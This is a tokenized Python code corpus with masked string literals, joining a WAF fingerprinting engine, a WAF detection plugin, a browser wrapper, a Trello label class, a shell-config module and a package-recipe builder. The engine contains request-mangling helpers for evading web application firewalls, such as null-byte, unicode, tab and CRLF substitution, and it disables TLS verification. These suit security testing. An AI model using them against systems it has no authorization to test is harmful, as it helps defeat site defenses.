<EOL> '<STR_LIT:1>' : '<STR_LIT>' , <EOL> '<STR_LIT:2>' : '<STR_LIT>' , <EOL> '<STR_LIT:3>' : '<STR_LIT>' , <EOL> '<STR_LIT:4>' : '<STR_LIT>' , <EOL> '<STR_LIT:5>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> homoglyphicmapping = { "<STR_LIT:'>" : '<STR_LIT>' } <EOL> def oururlparse ( target ) : <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> ssl = False <EOL> o = urlparse ( target ) <EOL> if o [ <NUM_LIT:0> ] not in [ '<STR_LIT:http>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> log . error ( '<STR_LIT>' % o [ <NUM_LIT:0> ] ) <EOL> return <EOL> if o [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> ssl = True <EOL> if len ( o [ <NUM_LIT:2> ] ) > <NUM_LIT:0> : <EOL> path = o [ <NUM_LIT:2> ] <EOL> else : <EOL> path = '<STR_LIT:/>' <EOL> tmp = o [ <NUM_LIT:1> ] . split ( '<STR_LIT::>' ) <EOL> if len ( tmp ) > <NUM_LIT:1> : <EOL> port = tmp [ <NUM_LIT:1> ] <EOL> else : <EOL> port = None <EOL> hostname = tmp [ <NUM_LIT:0> ] <EOL> query = o [ <NUM_LIT:4> ] <EOL> return ( hostname , port , path , query , ssl ) <EOL> def modifyurl ( path , modfunc , log ) : <EOL> path = path <EOL> log . debug ( '<STR_LIT>' % path ) <EOL> for m in re . findall ( '<STR_LIT>' , path ) : <EOL> ourstr = m [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> newstr = modfunc ( ourstr ) <EOL> log . debug ( '<STR_LIT>' % ourstr ) <EOL> log . debug ( '<STR_LIT>' % newstr ) <EOL> path = path . replace ( m , newstr ) <EOL> log . debug ( '<STR_LIT>' % path ) <EOL> return path <EOL> def modifypath ( path , newstrs , log , encode = True ) : <EOL> log . debug ( '<STR_LIT>' % path ) <EOL> for m in re . findall ( '<STR_LIT>' , path ) : <EOL> ourstr = m [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> for newstr in newstrs : <EOL> if encode : <EOL> newstr = quote ( newstr ) <EOL> log . debug ( '<STR_LIT>' % ourstr ) <EOL> log . debug ( '<STR_LIT>' % newstr ) <EOL> newpath = path . replace ( m , newstr ) . replace ( '<STR_LIT:]>' , '<STR_LIT>' ) . replace ( '<STR_LIT:[>' , '<STR_LIT>' ) <EOL> yield ( newpath ) <EOL> def bruteforceascii ( ourstr ) : <EOL> listourstr = list ( ourstr ) <EOL> for pos in range ( len ( ourstr ) ) : <EOL> for i in range ( <NUM_LIT> ) : <EOL> newlistourstr = listourstr [ : ] <EOL> newlistourstr [ pos ] = chr ( i ) <EOL> yield ( quote ( '<STR_LIT>' . join ( newlistourstr ) ) ) <EOL> def unicodeurlencode ( ourstr ) : <EOL> newstr = str ( ) <EOL> for character in ourstr : <EOL> if unicodemapping . has_key ( character ) : <EOL> newstr += unicodemapping [ character ] <EOL> else : <EOL> newstr += character <EOL> return newstr <EOL> def nullify ( ourstr ) : <EOL> newstr = str ( ) <EOL> for character in ourstr : <EOL> newstr += character + "<STR_LIT:\x00>" <EOL> return quote ( newstr ) <EOL> def replacechars ( ourstr , origchar , newchar ) : <EOL> newstr = ourstr . replace ( origchar , newchar ) <EOL> return newstr <EOL> def nullifyspaces ( ourstr ) : <EOL> return quote ( replacechars ( ourstr , '<STR_LIT:U+0020>' , '<STR_LIT:\x00>' ) ) <EOL> def slashspaces ( ourstr ) : <EOL> return replacechars ( ourstr , '<STR_LIT:U+0020>' , '<STR_LIT:/>' ) <EOL> def tabifyspaces ( ourstr ) : <EOL> return replacechars ( ourstr , '<STR_LIT:U+0020>' , '<STR_LIT:\t>' ) <EOL> def crlfspaces ( ourstr ) : <EOL> return replacechars ( ourstr , '<STR_LIT:U+0020>' , '<STR_LIT:\n>' ) <EOL> def backslashquotes ( ourstr ) : <EOL> return replacechars ( ourstr , "<STR_LIT:'>" , "<STR_LIT>" ) <EOL> class waftoolsengine : <EOL> def __init__ ( self , target = '<STR_LIT>' , port = <NUM_LIT> , ssl = False , <EOL> debuglevel = <NUM_LIT:0> , path = '<STR_LIT:/>' , followredirect = True , extraheaders = { } , <EOL> proxy = False ) : <EOL> """<STR_LIT>""" <EOL> self . target = target <EOL> if port is None : <EOL> if ssl : <EOL> port = <NUM_LIT> <EOL> else : <EOL> port = <NUM_LIT> <EOL> self . port = int ( port ) <EOL> self . ssl = ssl <EOL> self . debuglevel = debuglevel <EOL> self . cachedresponses = dict ( ) <EOL> self . requestnumber = <NUM_LIT:0> <EOL> self . path = path <EOL> self . redirectno = <NUM_LIT:0> <EOL> self . followredirect = followredirect <EOL> self . crawlpaths = list ( ) <EOL> self . extraheaders = extraheaders <EOL> try : <EOL> self . proxy = self . _parse_proxy ( proxy ) if proxy else NullProxy ( ) <EOL> except Exception as e : <EOL> self . log . critical ( "<STR_LIT>" % e ) <EOL> self . proxy = NullProxy ( ) <EOL> def request ( self , method = '<STR_LIT:GET>' , path = None , usecache = True , <EOL> cacheresponse = True , headers = None , <EOL> comingfromredir = False ) : <EOL> followredirect = self . followredirect <EOL> if comingfromredir : <EOL> self . redirectno += <NUM_LIT:1> <EOL> if self . redirectno >= <NUM_LIT:5> : <EOL> self . log . error ( '<STR_LIT>' ) <EOL> followredirect = False <EOL> else : <EOL> self . redirectno = <NUM_LIT:0> <EOL> if path is None : <EOL> path = self . path <EOL> for hdr in self . extraheaders . keys ( ) : <EOL> if headers is None : <EOL> headers = { } <EOL> headers [ hdr ] = self . extraheaders [ hdr ] <EOL> if headers is not None : <EOL> knownheaders = map ( lambda x : x . lower ( ) , headers . keys ( ) ) <EOL> else : <EOL> knownheaders = { } <EOL> headers = { } <EOL> if not '<STR_LIT>' in knownheaders : <EOL> headers [ <EOL> '<STR_LIT>' ] = '<STR_LIT>' <EOL> if not '<STR_LIT>' in knownheaders : <EOL> headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if not '<STR_LIT>' in knownheaders : <EOL> headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> k = str ( [ method , path , headers ] ) <EOL> if usecache : <EOL> if k in self . cachedresponses . keys ( ) : <EOL> self . log . debug ( '<STR_LIT>' % ( method , path ) ) <EOL> return self . cachedresponses [ k ] <EOL> else : <EOL> self . log . debug ( '<STR_LIT>' % ( k , self . cachedresponses . keys ( ) ) ) <EOL> r = self . _request ( method , path , headers ) <EOL> if cacheresponse : <EOL> self . cachedresponses [ k ] = r <EOL> if r : <EOL> response , responsebody = r <EOL> if response . status in [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] : <EOL> if followredirect : <EOL> if response . getheader ( '<STR_LIT:location>' ) : <EOL> newloc = response . getheader ( '<STR_LIT:location>' ) <EOL> self . log . info ( '<STR_LIT>' % newloc ) <EOL> pret = oururlparse ( newloc ) <EOL> if pret is not None : <EOL> ( target , port , path , query , ssl ) = pret <EOL> if not port : port = <NUM_LIT> <EOL> if target == '<STR_LIT>' : <EOL> target = self . target <EOL> if port is None : <EOL> port = self . port <EOL> if not path . startswith ( '<STR_LIT:/>' ) : <EOL> path = '<STR_LIT:/>' + path <EOL> if ( target , port , ssl ) == ( self . target , self . port , ssl ) : <EOL> r = self . request ( method , path , usecache , cacheresponse , <EOL> headers , comingfromredir = True ) <EOL> else : <EOL> self . log . warn ( '<STR_LIT>' % newloc ) <EOL> else : <EOL> self . log . warn ( '<STR_LIT>' % response . getheader ( '<STR_LIT:location>' ) ) <EOL> return r <EOL> def _request ( self , method , path , headers ) : <EOL> original_socket = socket . socket <EOL> try : <EOL> conn_factory , connect_host , connect_port , query_path = self . proxy . prepare ( self . target , self . port , path , self . ssl ) <EOL> params = dict ( ) <EOL> if sys . hexversion > <NUM_LIT> : <EOL> params [ '<STR_LIT>' ] = <NUM_LIT:4> <EOL> if ( sys . hexversion >= <NUM_LIT> ) and self . ssl : <EOL> import ssl as ssllib <EOL> params [ '<STR_LIT>' ] = ssllib . _create_unverified_context ( ) <EOL> h = conn_factory ( connect_host , connect_port , ** params ) <EOL> if self . debuglevel <= <NUM_LIT:10> : <EOL> if self . debuglevel > <NUM_LIT:1> : <EOL> h . set_debuglevel ( self . debuglevel ) <EOL> try : <EOL> self . log . info ( '<STR_LIT>' % ( method , path ) ) <EOL> h . request ( method , query_path , headers = headers ) <EOL> except socket . error : <EOL> self . log . warn ( '<STR_LIT>' % self . target ) <EOL> return <EOL> self . requestnumber += <NUM_LIT:1> <EOL> response = h . getresponse ( ) <EOL> responsebody = response . read ( ) <EOL> h . close ( ) <EOL> r = response , responsebody <EOL> except ( socket . error , socket . timeout , httplib . BadStatusLine ) : <EOL> self . log . warn ( '<STR_LIT>' ) <EOL> r = None <EOL> finally : <EOL> self . proxy . terminate ( ) <EOL> return r <EOL> def querycrawler ( self , path = None , curdepth = <NUM_LIT:0> , maxdepth = <NUM_LIT:1> ) : <EOL> self . log . debug ( '<STR_LIT>' % path ) <EOL> localcrawlpaths = list ( ) <EOL> if curdepth > maxdepth : <EOL> self . log . info ( '<STR_LIT>' % maxdepth ) <EOL> return <EOL> r = self . request ( path = path ) <EOL> if r is None : <EOL> return <EOL> response , responsebody = r <EOL> try : <EOL> soup = BeautifulSoup ( responsebody ) <EOL> except : <EOL> self . log . warn ( '<STR_LIT>' ) <EOL> return <EOL> tags = soup ( '<STR_LIT:a>' ) <EOL> for tag in tags : <EOL> try : <EOL> href = tag [ "<STR_LIT>" ] <EOL> if href is not None : <EOL> tmpu = urlparse ( href ) <EOL> if ( tmpu [ <NUM_LIT:1> ] != '<STR_LIT>' ) and ( self . target != tmpu [ <NUM_LIT:1> ] ) : <EOL> self . log . debug ( '<STR_LIT>' % href ) <EOL> continue <EOL> if tmpu [ <NUM_LIT:0> ] not in [ '<STR_LIT:http>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . log . debug ( '<STR_LIT>' % href ) <EOL> continue <EOL> path = tmpu [ <NUM_LIT:2> ] <EOL> if not path . startswith ( '<STR_LIT:/>' ) : <EOL> path = '<STR_LIT:/>' + path <EOL> if len ( tmpu [ <NUM_LIT:4> ] ) > <NUM_LIT:0> : <EOL> location = urlunparse ( ( '<STR_LIT>' , '<STR_LIT>' , path , tmpu [ <NUM_LIT:3> ] , tmpu [ <NUM_LIT:4> ] , '<STR_LIT>' ) ) <EOL> self . log . info ( '<STR_LIT>' % location ) <EOL> return href <EOL> if path not in self . crawlpaths : <EOL> href = unquote ( path ) <EOL> self . log . debug ( '<STR_LIT>' % href ) <EOL> self . crawlpaths . append ( href ) <EOL> localcrawlpaths . append ( href ) <EOL> except KeyError : <EOL> pass <EOL> for nextpath in localcrawlpaths : <EOL> r = self . querycrawler ( path = nextpath , curdepth = curdepth + <NUM_LIT:1> , maxdepth = maxdepth ) <EOL> if r : <EOL> return r <EOL> def _parse_proxy ( self , proxy ) : <EOL> parts = urlparse ( proxy ) <EOL> if not parts . scheme or not parts . netloc : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> netloc = parts . netloc . split ( "<STR_LIT::>" ) <EOL> if len ( netloc ) != <NUM_LIT:2> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> try : <EOL> if parts . scheme == "<STR_LIT>" : <EOL> if socks is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> return Socks5Proxy ( netloc [ <NUM_LIT:0> ] , int ( netloc [ <NUM_LIT:1> ] ) ) <EOL> elif parts . scheme == "<STR_LIT:http>" : <EOL> return HttpProxy ( netloc [ <NUM_LIT:0> ] , int ( netloc [ <NUM_LIT:1> ] ) ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> except ValueError : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def scrambledheader ( header ) : <EOL> c = '<STR_LIT>' <EOL> if len ( header ) != len ( c ) : <EOL> return False <EOL> if header == c : <EOL> return False <EOL> for character in c : <EOL> if c . count ( character ) != header . count ( character ) : <EOL> return False <EOL> return True </s>
<s> NAME = '<STR_LIT>' <EOL> def is_waf ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . matchcookie ( '<STR_LIT>' ) : <EOL> return True <EOL> if self . matchheader ( ( '<STR_LIT>' , '<STR_LIT>' ) , attack = True ) : <EOL> return True <EOL> if self . matchheader ( ( '<STR_LIT>' , '<STR_LIT>' ) , attack = True ) : <EOL> return True <EOL> if self . matchheader ( ( '<STR_LIT>' , '<STR_LIT>' ) , attack = True ) : <EOL> return True <EOL> if self . matchheader ( ( '<STR_LIT>' , '<STR_LIT:.>' ) , attack = True ) : <EOL> return True <EOL> if self . matchheader ( ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> return True <EOL> if self . matchcookie ( '<STR_LIT>' ) : <EOL> return True <EOL> return False </s>
<s> """<STR_LIT>""" <EOL> import os , sys , time , logging <EOL> from subprocess import * <EOL> import resource <EOL> import utils <EOL> from config import settings <EOL> log = logging . getLogger ( ) <EOL> blank = '<STR_LIT>' <EOL> _threshold = <NUM_LIT:0> <EOL> def setrlimit ( ) : <EOL> """<STR_LIT>""" <EOL> resource . setrlimit ( resource . RLIMIT_RSS , ( _threshold , _threshold ) ) <EOL> class Browser : <EOL> def __init__ ( self , home = blank ) : <EOL> """<STR_LIT>""" <EOL> self . home = home <EOL> self . launch ( self . home ) <EOL> self . do ( '<STR_LIT>' % home ) <EOL> def launch ( self , home = blank ) : <EOL> """<STR_LIT>""" <EOL> _threshold = settings . uzbl . ram . hard_limit <EOL> self . uzbl = Popen ( [ '<STR_LIT>' , '<STR_LIT>' % ( settings . screen . width , settings . screen . height ) , '<STR_LIT>' % home ] , stdin = PIPE , stdout = PIPE , stderr = PIPE , preexec_fn = setrlimit ) <EOL> self . fifo = '<STR_LIT>' % self . uzbl . pid <EOL> while not os . path . exists ( self . fifo ) : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> self . do ( '<STR_LIT>' % home ) <EOL> def terminate ( self ) : <EOL> """<STR_LIT>""" <EOL> self . uzbl . terminate ( ) <EOL> def kill ( self ) : <EOL> """<STR_LIT>""" <EOL> self . uzbl . kill ( ) <EOL> def restart ( self ) : <EOL> """<STR_LIT>""" <EOL> self . uzbl . terminate ( ) <EOL> self . launch ( blank ) <EOL> def blank ( self ) : <EOL> """<STR_LIT>""" <EOL> self . do ( '<STR_LIT>' % blank ) <EOL> def do ( self , buffer ) : <EOL> """<STR_LIT>""" <EOL> returncode = self . uzbl . poll ( ) <EOL> if returncode == None : <EOL> if settings . uzbl . ram . soft_limit < utils . get_pid_rss ( self . uzbl . pid ) : <EOL> log . debug ( "<STR_LIT>" ) <EOL> self . restart ( ) <EOL> log . debug ( buffer ) <EOL> h = open ( self . fifo , '<STR_LIT:a>' ) <EOL> h . write ( "<STR_LIT>" ) <EOL> h . write ( buffer + '<STR_LIT:\n>' ) <EOL> h . close ( ) <EOL> else : <EOL> log . error ( "<STR_LIT>" % returncode ) <EOL> self . launch ( self . home ) <EOL> self . do ( buffer ) </s>
<s> from __future__ import with_statement , print_function , absolute_import <EOL> class Label ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , client , label_id , name , color = "<STR_LIT>" ) : <EOL> self . client = client <EOL> self . id = label_id <EOL> self . name = name <EOL> self . color = color <EOL> @ classmethod <EOL> def from_json ( cls , board , json_obj ) : <EOL> """<STR_LIT>""" <EOL> label = Label ( board . client , <EOL> label_id = json_obj [ '<STR_LIT:id>' ] , <EOL> name = json_obj [ '<STR_LIT:name>' ] . encode ( '<STR_LIT:utf-8>' ) , <EOL> color = json_obj [ '<STR_LIT>' ] ) <EOL> return label <EOL> @ classmethod <EOL> def from_json_list ( cls , board , json_objs ) : <EOL> return [ cls . from_json ( board , obj ) for obj in json_objs ] <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . name <EOL> def fetch ( self ) : <EOL> """<STR_LIT>""" <EOL> json_obj = self . client . fetch_json ( '<STR_LIT>' + self . id ) <EOL> self . name = json_obj [ '<STR_LIT:name>' ] . encode ( '<STR_LIT:utf-8>' ) <EOL> self . color = json_obj [ '<STR_LIT>' ] <EOL> return self </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> import re <EOL> from vex import exceptions <EOL> try : <EOL> FileNotFoundError <EOL> except NameError : <EOL> FileNotFoundError = IOError <EOL> NOT_SCARY = re . compile ( br'<STR_LIT>' ) <EOL> def scary_path ( path ) : <EOL> """<STR_LIT>""" <EOL> if not path : <EOL> return True <EOL> assert isinstance ( path , bytes ) <EOL> return not NOT_SCARY . match ( path ) <EOL> def shell_config_for ( shell , vexrc , environ ) : <EOL> """<STR_LIT>""" <EOL> here = os . path . dirname ( os . path . abspath ( __file__ ) ) <EOL> path = os . path . join ( here , '<STR_LIT>' , shell ) <EOL> try : <EOL> with open ( path , '<STR_LIT:rb>' ) as inp : <EOL> data = inp . read ( ) <EOL> except FileNotFoundError as error : <EOL> if error . errno != <NUM_LIT:2> : <EOL> raise <EOL> return b'<STR_LIT>' <EOL> ve_base = vexrc . get_ve_base ( environ ) . encode ( '<STR_LIT:ascii>' ) <EOL> if ve_base and not scary_path ( ve_base ) and os . path . exists ( ve_base ) : <EOL> data = data . replace ( b'<STR_LIT>' , ve_base ) <EOL> return data <EOL> def handle_shell_config ( shell , vexrc , environ ) : <EOL> """<STR_LIT>""" <EOL> from vex import shell_config <EOL> data = shell_config . shell_config_for ( shell , vexrc , environ ) <EOL> if not data : <EOL> raise exceptions . OtherShell ( "<STR_LIT>" . format ( shell ) ) <EOL> if hasattr ( sys . stdout , '<STR_LIT>' ) : <EOL> sys . stdout . buffer . write ( data ) <EOL> else : <EOL> sys . stdout . write ( data ) <EOL> return <NUM_LIT:0> </s>
<s> import os <EOL> from conary import files <EOL> from conary . build import defaultrecipes <EOL> from conary . build . packagerecipe import AbstractPackageRecipe , BaseRequiresRecipe <EOL> from conary . repository import changeset <EOL> class DerivedChangesetExploder ( changeset . ChangesetExploder ) : <EOL> def __init__ ( self , recipe , cs , destDir ) : <EOL> self . byDefault = { } <EOL> self . troveFlavor = None <EOL> self . recipe = recipe <EOL> changeset . ChangesetExploder . __init__ ( self , cs , destDir ) <EOL> def installingTrove ( self , trv ) : <EOL> if self . troveFlavor is None : <EOL> self . troveFlavor = trv . getFlavor ( ) . copy ( ) <EOL> else : <EOL> assert ( self . troveFlavor == trv . getFlavor ( ) ) <EOL> name = trv . getName ( ) <EOL> self . recipe . _componentReqs [ name ] = trv . getRequires ( ) . copy ( ) <EOL> self . recipe . _componentProvs [ name ] = trv . getProvides ( ) . copy ( ) <EOL> if trv . isCollection ( ) : <EOL> self . byDefault . update ( dict ( <EOL> [ ( x [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , x [ <NUM_LIT:1> ] ) for x in trv . iterTroveListInfo ( ) ] ) ) <EOL> changeset . ChangesetExploder . installingTrove ( self , trv ) <EOL> def handleFileAttributes ( self , trv , fileObj , path ) : <EOL> self . troveFlavor -= fileObj . flavor ( ) <EOL> if fileObj . flags . isConfig ( ) : <EOL> self . recipe . Config ( path , allowUnusedFilters = True ) <EOL> elif fileObj . flags . isInitialContents ( ) : <EOL> self . recipe . InitialContents ( path , allowUnusedFilters = True ) <EOL> elif fileObj . flags . isTransient ( ) : <EOL> self . recipe . Transient ( path , allowUnusedFilters = True ) <EOL> if isinstance ( fileObj , files . SymbolicLink ) : <EOL> self . recipe . _derivedFiles [ path ] = fileObj . target ( ) <EOL> else : <EOL> self . recipe . _derivedFiles [ path ] = fileObj . inode . mtime ( ) <EOL> self . recipe . _componentReqs [ trv . getName ( ) ] -= fileObj . requires ( ) <EOL> self . recipe . _componentProvs [ trv . getName ( ) ] -= fileObj . requires ( ) <EOL> def handleFileMode ( self , trv , fileObj , path , destdir ) : <EOL> if isinstance ( fileObj , files . SymbolicLink ) : <EOL> return <EOL> fullPath = '<STR_LIT:/>' . join ( ( destdir , path ) ) <EOL> mode = fileObj . inode . perms ( ) <EOL> os . chmod ( fullPath , mode & <NUM_LIT:0> <NUM_LIT> ) <EOL> if fileObj . inode . perms ( ) & <NUM_LIT:0> <NUM_LIT> != <NUM_LIT:0> : <EOL> self . recipe . setModes ( path , sidbits = ( mode & <NUM_LIT:0> <NUM_LIT> ) ) <EOL> if isinstance ( fileObj , files . Directory ) : <EOL> if ( fileObj . inode . perms ( ) & <NUM_LIT:0> <NUM_LIT> ) != <NUM_LIT:0> <NUM_LIT> : <EOL> os . chmod ( fullPath , ( mode & <NUM_LIT:0> <NUM_LIT> ) | <NUM_LIT:0> <NUM_LIT> ) <EOL> self . recipe . setModes ( path , userbits = ( mode & <NUM_LIT:0> <NUM_LIT> ) ) <EOL> self . recipe . ExcludeDirectories ( exceptions = path , <EOL> allowUnusedFilters = True ) <EOL> def restoreFile ( self , trv , fileObj , contents , destdir , path ) : <EOL> self . handleFileAttributes ( trv , fileObj , path ) <EOL> if isinstance ( fileObj , files . DeviceFile ) : <EOL> self . recipe . MakeDevices ( path , fileObj . lsTag , <EOL> fileObj . devt . major ( ) , fileObj . devt . minor ( ) , <EOL> fileObj . inode . owner ( ) , fileObj . inode . group ( ) , <EOL> fileObj . inode . perms ( ) ) <EOL> else : <EOL> changeset . ChangesetExploder . restoreFile ( self , trv , fileObj , <EOL> contents , destdir , path ) <EOL> self . handleFileMode ( trv , fileObj , path , destdir ) <EOL> def restoreLink ( self , trv , fileObj , destdir , sourcePath , targetPath ) : <EOL> self . handleFileAttributes ( trv , fileObj , targetPath ) <EOL> changeset . ChangesetExploder . restoreLink ( self , trv , fileObj , destdir , <EOL> sourcePath , targetPath ) <EOL> def installFile ( self , trv , path , fileObj ) : <EOL> if path == self . recipe . macros . buildlogpath : <EOL> return False <EOL> return changeset . ChangesetExploder . installFile ( self , trv , path , fileObj ) <EOL> from conary import versions <EOL> from conary import errors as conaryerrors <EOL> from conary . build import build , source <EOL> from conary . build import errors as builderrors <EOL> from conary . lib import log <EOL> class AbstractDerivedPackageRecipe ( AbstractPackageRecipe ) : <EOL> internalAbstractBaseClass = <NUM_LIT:1> <EOL> _isDerived = True <EOL> parentVersion = None <EOL> def _expandChangeset ( self , cs ) : <EOL> exploder = DerivedChangesetExploder ( self , cs , self . macros . destdir ) <EOL> self . useFlags = exploder . troveFlavor <EOL> self . setByDefaultOn ( set ( x for x in exploder . byDefault <EOL> if exploder . byDefault [ x ] ) ) <EOL> self . setByDefaultOff ( set ( x for x in exploder . byDefault <EOL> if not exploder . byDefault [ x ] ) ) <EOL> def unpackSources ( self , resume = None , downloadOnly = False ) : <EOL> repos = self . laReposCache . repos <EOL> if self . parentVersion : <EOL> try : <EOL> parentRevision = versions . Revision ( self . parentVersion ) <EOL> except conaryerrors . ParseError , e : <EOL> raise builderrors . RecipeFileError ( <EOL> '<STR_LIT>' % ( self . parentVersion , str ( e ) ) ) <EOL> else : <EOL> parentRevision = None <EOL> sourceBranch = versions . VersionFromString ( self . macros . buildbranch ) <EOL> if not sourceBranch . isShadow ( ) : <EOL> raise builderrors . RecipeFileError ( <EOL> "<STR_LIT>" ) <EOL> if parentRevision and self . sourceVersion . trailingRevision ( ) . getVersion ( ) != parentRevision . getVersion ( ) : <EOL> raise builderrors . RecipeFileError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parentBranch = sourceBranch . parentBranch ( ) <EOL> if parentRevision : <EOL> parentVersion = parentBranch . createVersion ( parentRevision ) <EOL> d = repos . getTroveVersionFlavors ( { self . name : <EOL> { parentVersion : [ None ] } } ) <EOL> if self . name not in d : <EOL> raise builderrors . RecipeFileError ( <EOL> '<STR_LIT>' <EOL> % ( parentVersion , self . name ) ) <EOL> elif self . sourceVersion : <EOL> sourceRevision = self . sourceVersion . trailingRevision ( ) <EOL> d = repos . getTroveVersionsByLabel ( <EOL> { self . name : { parentBranch . label ( ) : [ None ] } } ) <EOL> if self . name not in d or not d [ self . name ] : <EOL> raise builderrors . RecipeFileError ( <EOL> '<STR_LIT>' % <EOL> ( self . name , parentBranch . label ( ) ) ) <EOL> versionList = reversed ( sorted ( d [ self . name ] ) ) <EOL> match = False <EOL> for version in versionList : <EOL> sr = sourceRevision . copy ( ) <EOL> sr . getSourceCount ( ) . truncateShadowCount ( <EOL> version . trailingRevision ( ) . shadowCount ( ) ) <EOL> if ( version . getSourceVersion ( ) . trailingRevision ( ) == sr ) : <EOL> match = True <EOL> break <EOL> if not match : <EOL> raise builderrors . RecipeFileError ( <EOL> '<STR_LIT>' <EOL> % ( self . name , sourceRevision , parentBranch . label ( ) ) ) <EOL> parentVersion = version <EOL> else : <EOL> parentVersion = parentBranch <EOL> try : <EOL> troveList = repos . findTrove ( None , <EOL> ( self . name , parentVersion , self . _buildFlavor ) ) <EOL> except conaryerrors . TroveNotFound , err : <EOL> raise builderrors . RecipeFileError ( '<STR_LIT>' + str ( err ) ) <EOL> if len ( troveList ) > <NUM_LIT:1> : <EOL> raise builderrors . RecipeFileError ( <EOL> '<STR_LIT>' % ( self . name , parentVersion , self . cfg . buildFlavor ) ) <EOL> parentFlavor = troveList [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] <EOL> parentVersion = troveList [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> log . info ( '<STR_LIT>' , self . name , parentVersion , <EOL> parentFlavor ) <EOL> v = parentVersion . getSourceVersion ( removeShadows = False ) <EOL> binaries = repos . getTrovesBySource ( self . name + '<STR_LIT>' , v ) <EOL> binaries = [ x for x in binaries if ( x [ <NUM_LIT:1> ] , x [ <NUM_LIT:2> ] ) == ( parentVersion , <EOL> parentFlavor ) ] <EOL> troveSpec = [ ( x [ <NUM_LIT:0> ] , ( None , None ) , ( x [ <NUM_LIT:1> ] , x [ <NUM_LIT:2> ] ) , True ) <EOL> for x in binaries ] <EOL> cs = repos . createChangeSet ( troveSpec , recurse = False ) <EOL> for trv in cs . iterNewTroveList ( ) : <EOL> if trv . hasCapsule ( ) : <EOL> raise builderrors . RecipeFileError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % trv . name ( ) ) <EOL> self . setDerivedFrom ( [ <EOL> ( x . getName ( ) , x . getNewVersion ( ) , x . getNewFlavor ( ) ) for x <EOL> in cs . iterNewTroveList ( ) ] ) <EOL> self . _expandChangeset ( cs ) <EOL> self . cs = cs <EOL> klass = self . _getParentClass ( '<STR_LIT>' ) <EOL> klass . unpackSources ( self , resume = resume , <EOL> downloadOnly = downloadOnly ) <EOL> def loadPolicy ( self ) : <EOL> klass = self . _getParentClass ( '<STR_LIT>' ) <EOL> return klass . loadPolicy ( self , <EOL> internalPolicyModules = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ) ) <EOL> def __init__ ( self , cfg , laReposCache , srcDirs , extraMacros = { } , <EOL> crossCompile = None , lightInstance = False ) : <EOL> klass = self . _getParentClass ( '<STR_LIT>' ) <EOL> klass . __init__ ( self , cfg , laReposCache , srcDirs , <EOL> extraMacros = extraMacros , <EOL> crossCompile = crossCompile , <EOL> lightInstance = lightInstance ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Ant ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Automake ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . ClassPath ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . CompilePython ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Configure ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . ConsoleHelper ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Copy ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Create ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Desktopfile ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Doc ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Environment ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Install ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . JavaCompile ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . JavaDoc ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Link ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Make ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . MakeDirs ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . MakeInstall ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . MakeParallelSubdir ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . MakePathsInstall ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . ManualConfigure ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Move ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . PythonSetup ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Remove ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Replace ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Run ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . SetModes ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . SGMLCatalogEntry ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . Symlink ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . XInetdService ) <EOL> self . _addBuildAction ( '<STR_LIT>' , build . XMLCatalogEntry ) <EOL> self . _addSourceAction ( '<STR_LIT>' , source . addArchive ) <EOL> self . _addSourceAction ( '<STR_LIT>' , source . addAction ) <EOL> self . _addSourceAction ( 